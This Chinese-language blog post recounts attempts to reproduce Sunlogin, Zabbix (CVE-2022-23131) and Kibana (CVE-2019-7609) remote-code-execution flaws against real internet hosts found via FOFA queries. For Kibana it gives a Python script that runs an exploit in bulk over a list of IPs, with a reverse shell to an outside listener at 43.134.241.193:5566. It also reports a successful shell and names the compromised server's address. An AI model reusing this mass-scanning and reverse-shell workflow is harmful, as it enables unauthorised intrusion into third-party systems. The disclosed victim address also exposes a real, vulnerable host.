应用协议-Kibana+Zabbix+远控向日葵
案例:CNVD-2022-10207:向日葵RCE
影响客户端版本:
11.1.1
10.3.0.27372
11.0.0.33162
在Windows 10中安装向日葵程序,并关闭系统防火墙
开启向日葵发现漏洞版本都已经淘汰了,已经无法利用,搜索解决方法让更新版本
利用工具探测也一无所获
fofa获取资产批量扫描也一个漏洞都没有
案例演示:设备平台-Zabbix-CVE-2022-23131
影响版本
Zabbix Web 前端版本包括
•5.4.8
•5.0.18
•4.0.36
•6.0.0alpha1
漏洞复现
Fofa 语法
app="ZABBIX-监控系统" && body="saml"
根据语法获取到大量资产
经过5--6个目标的复现,发现漏洞已经无法利用,官方增加了新的验证
根据漏洞复现文章得出:绕过以下登录验证即可进入zabbix后台
但是绕过此登录验证后并没有进入后台,而是跳转到了另一个账户验证。尝试复现多个目标都是如此
官方应该增加了一个账户验证,只有在租户中的账户才能登录zabbix
浏览器搜索该漏洞,发现复现文章也截至在了2022年,2023年无此漏洞复现文章
案例演示:设备平台-Kibana-CVE-2019-7609
漏洞产生
攻击者利用漏洞可以通过Kibana后台中的Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。
影响范围
Kibana < 6.6.1
Kibana < 5.6.15
fofa获取大量资产,使用脚本测试漏洞,但是脚本只能一次测试单个ip
所以利用python编写一个批量脚本:
将大量ip保存到一个ips.txt文件
pyrhon脚本内容:漏洞测试脚本每执行结束一条命令,就将命令中的ip替换接着执行
脚本:
import os
for ip in open("ips.txt"):
ip=ip.strip()
#print(ip)
cmdline='python CVE-2019-7609-kibana-rce.py -u %s -host 43.134.241.193 -port 5566 --shell'%ip
print(cmdline)
os.system(cmdline)
python运行脚本,成功实现批量检测
然而这个漏洞貌似也过时了,扫描几个小时也没有出现一个
出现几个也都是误报,无法反弹shell
经过一晚上检测之后终于成功反弹shell
漏洞地址:http://1.116.90.210:5601
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。